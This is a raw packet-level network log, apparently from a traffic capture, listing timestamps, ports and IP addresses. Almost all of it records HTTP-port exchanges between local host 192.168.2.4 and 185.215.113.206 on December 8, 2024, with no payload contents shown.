Dec 8, 2024 19:52:23.843055010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.843086958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.843125105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.846967936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.847037077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.847151995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.847192049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.851106882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.851155043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.851243019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.851274967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.854934931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.854979992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.855041981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.855081081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.860327005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.860379934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.860469103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.860508919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.865056992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.865112066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.865113974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.865154028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.894280910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.894356012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.894421101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.894469023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.896271944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.896318913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.896349907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.896387100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.900345087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.900393009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.956938982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.956993103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.957066059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.957112074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.958370924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.958467007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.958489895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.958524942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.960777998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.960813046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.960833073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.960846901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.963747025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.963784933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.963838100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.963879108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.967026949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.967067957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.967120886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.967156887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.970097065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.970139980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.970170021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.970221043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.972527027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.972575903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.972625971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.972659111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.975296974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.975346088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.975378990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.975416899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.978176117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.978225946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.978375912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.978420019 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.981085062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.981137991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.981232882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.981270075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.983724117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.983767986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.983835936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.983867884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.986586094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.986638069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.986665010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.986702919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.989468098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.989506960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.989590883 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.989623070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.992398977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.992450953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.992511034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.992546082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.995111942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.995162010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.995213985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.995254993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.997822046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.997865915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.997980118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.998019934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.000755072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.000807047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.000880957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.000917912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.003437996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.003501892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.003535032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.003585100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.006521940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.006561041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.006620884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.006660938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.009079933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.009120941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.009182930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.009218931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.012487888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.012527943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.012552023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.012588978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.015319109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.015361071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.015415907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.015460968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.017891884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.017932892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.018011093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.018044949 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.020359039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.020401955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.020567894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.020606995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.022527933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.022567034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.022588968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.022620916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.024507046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.024545908 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.024610996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.024642944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.026546955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.026591063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.026644945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.026680946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.028573990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.028614044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.028681993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.028717041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.030592918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.030627966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.030749083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.030785084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.032609940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.032650948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.032711029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.032751083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.034637928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.034682035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.034758091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.034791946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.036684990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.036729097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.036787987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.036832094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.038722038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.038760900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.038822889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.038857937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.041093111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.041131020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.041507959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.041552067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.042783976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.042828083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.042891026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.042932987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.044871092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.044912100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.045027971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.045073986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.047914982 CET	49723	80	192.168.2.4	2.22.50.144
Dec 8, 2024 19:52:24.082015991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.082062006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.082143068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.082178116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.083194971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.083235025 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.083321095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.083358049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.085093975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.085135937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.085167885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.085202932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.087064981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.087102890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.087179899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.087214947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.089232922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.089277983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.089406967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.089446068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.148885965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.148941994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.149019957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.149075031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.149720907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.149765968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.149920940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.149964094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.151083946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.151129961 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.151206970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.151246071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.152826071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.152869940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.152956009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.152993917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.154608965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.154654026 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.154740095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.154783010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.156280994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.156320095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.156368017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.156410933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.157977104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.158019066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.158020020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.158054113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.159507990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.159553051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.159626007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.159668922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.161145926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.161189079 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.161220074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.161256075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.162739992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.162782907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.162811041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.162856102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.164386988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.164432049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.164459944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.164499044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.165921926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.165961981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.166039944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.166084051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.167572021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.167615891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.167676926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.167716026 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.169224977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.169267893 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.169316053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.169351101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.170875072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.170918941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.171050072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.171092987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.172430992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.172471046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.172564030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.172609091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.174046993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.174091101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.174174070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.174206018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.175681114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.175717115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.175792933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.175829887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.177848101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.177897930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.178051949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.178095102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.180190086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.180226088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.180366039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.180412054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.182605982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.182648897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.182806015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.182852983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.184308052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.184351921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.184537888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.184585094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.185923100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.185978889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.185998917 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.186044931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.187099934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.187141895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.187144995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.187184095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.188574076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.188616991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.188636065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.188666105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.189883947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.189945936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.189964056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.189995050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.191525936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.191575050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.191617966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.191656113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.192883968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.192929029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.193016052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.193061113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.194721937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.194765091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.194789886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.194832087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.196119070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.196160078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.196213007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.196254969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.196897030 CET	80	49723	2.22.50.144	192.168.2.4
Dec 8, 2024 19:52:24.196945906 CET	49723	80	192.168.2.4	2.22.50.144
Dec 8, 2024 19:52:24.197390079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.197432995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.197463989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.197496891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.198692083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.198730946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.198751926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.198801041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.200205088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.200244904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.200248003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.200294018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.201637030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.201679945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.201742887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.201785088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.203461885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.203505993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:24.203586102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:24.203625917 CET	49748	80	192.168.2.4	185.215.113.206
